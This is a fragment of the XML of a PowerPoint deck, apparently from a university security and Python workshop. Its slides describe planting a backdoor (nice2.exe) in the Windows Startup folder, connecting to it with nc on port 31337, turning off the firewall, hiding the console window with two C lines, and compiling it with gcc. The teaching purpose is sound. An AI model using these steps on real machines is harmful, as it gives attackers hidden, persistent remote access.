                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Workshop\SimpleBindBackdoor\nice2.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"C:\Users\Malware Analysis\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nice2.exe"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Optionally run the backdoor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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Workshop\SimpleBackdoor\nice2.exe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Anybody can do this command to get into the backdoor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> victim-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 31337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If does not work, turn off firewall (turned off by default)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5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Planting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backdoor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3"/>
            <a:ext cx="8229600" cy="442833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 startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TA restarts Windows 10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 startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anybody </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command to get into the backdoor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/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 192.168.7.62 31337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 startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The backdoor window can be hidden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Uncomment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>these two lines in nice2.c</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	HWND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hWnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetConsoleWindow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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ShowWindow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hWnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, SW_HIDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>gcc.exe nice2.c -o nice2.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>ws2_32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37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7C4FC8F9-E0B6-4016-BC57-1CF4EAF8027D}" vid="{9545BAA4-FCEE-49A6-A097-1EE1F0B2A1E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15211</TotalTime>
  <Words>3774</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>631</Paragraphs>
  <Slides>61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Courier</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Theme1</vt:lpstr>
      <vt:lpstr>Introduction to Python</vt:lpstr>
      <vt:lpstr>Tutorials</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Levels of Programming Languages</vt:lpstr>
      <vt:lpstr>Attack Scenario</vt:lpstr>
      <vt:lpstr>Planting Backdoor</vt:lpstr>
      <vt:lpstr>Attack Code to Get into Windows</vt:lpstr>
      <vt:lpstr>Planting Backdoor (Cont’d)</vt:lpstr>
      <vt:lpstr>Planting Backdoor (Cont’d)</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Brief History of Python</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Running Interactively</vt:lpstr>
      <vt:lpstr>IDLE Development Environment</vt:lpstr>
      <vt:lpstr>Other Editors</vt:lpstr>
      <vt:lpstr>Running Programs/Scripts</vt:lpstr>
      <vt:lpstr>How does Running Python Scripts Work?</vt:lpstr>
      <vt:lpstr>A Code Sample (basics.py)</vt:lpstr>
      <vt:lpstr>Running Results of basics.py</vt:lpstr>
      <vt:lpstr>Enough to Understand the Code</vt:lpstr>
      <vt:lpstr>What Code Runs First?</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Basic Datatypes</vt:lpstr>
      <vt:lpstr>Whitespace</vt:lpstr>
      <vt:lpstr>Comments</vt:lpstr>
      <vt:lpstr>Assignment</vt:lpstr>
      <vt:lpstr>Naming Rules</vt:lpstr>
      <vt:lpstr>Naming Conventions</vt:lpstr>
      <vt:lpstr>Assignment</vt:lpstr>
      <vt:lpstr>Accessing Non-Existent Name</vt:lpstr>
      <vt:lpstr>for loop</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Sequence Types</vt:lpstr>
      <vt:lpstr>Similar Syntax</vt:lpstr>
      <vt:lpstr>Define Sequence Types</vt:lpstr>
      <vt:lpstr>Access Sequence Types</vt:lpstr>
      <vt:lpstr>Positive and Negative Indices</vt:lpstr>
      <vt:lpstr>Slicing: Return Copy of a Subset</vt:lpstr>
      <vt:lpstr>Slicing</vt:lpstr>
      <vt:lpstr>Copying the Whole Sequence</vt:lpstr>
      <vt:lpstr>The ‘in’ Operator</vt:lpstr>
      <vt:lpstr>The + Operator</vt:lpstr>
      <vt:lpstr>The * Operator</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Lists are mutable</vt:lpstr>
      <vt:lpstr>Tuples are immutable</vt:lpstr>
      <vt:lpstr>Operations on Lists Only </vt:lpstr>
      <vt:lpstr>The extend method vs  +  </vt:lpstr>
      <vt:lpstr>Operations on Lists Only</vt:lpstr>
      <vt:lpstr>Operations on Lists Only</vt:lpstr>
      <vt:lpstr>Summary: Tuples vs. Lists</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Function Definition</vt:lpstr>
      <vt:lpstr>Simple functions: ex.py</vt:lpstr>
      <vt:lpstr>Where are functions defined?</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Exceptions</vt:lpstr>
      <vt:lpstr>Handle Exceptions</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Plant Backdoor</vt:lpstr>
      <vt:lpstr>Backup Slides</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>BIS@DSU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Xinwen Fu</dc:creator>
  <cp:lastModifiedBy>Fu, Xinwen</cp:lastModifiedBy>
  <cp:revision>1344</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">1995-06-02T21:27:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-19T14:19:55Z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gong@mcnc.org</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="HomePage">
    <vt:lpwstr>http://www.mcnc.org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true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2</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="OutputDir">
    <vt:lpwstr>C:\fmg\cs591w</vt:lpwstr>
  </property>
</Properties>
</file>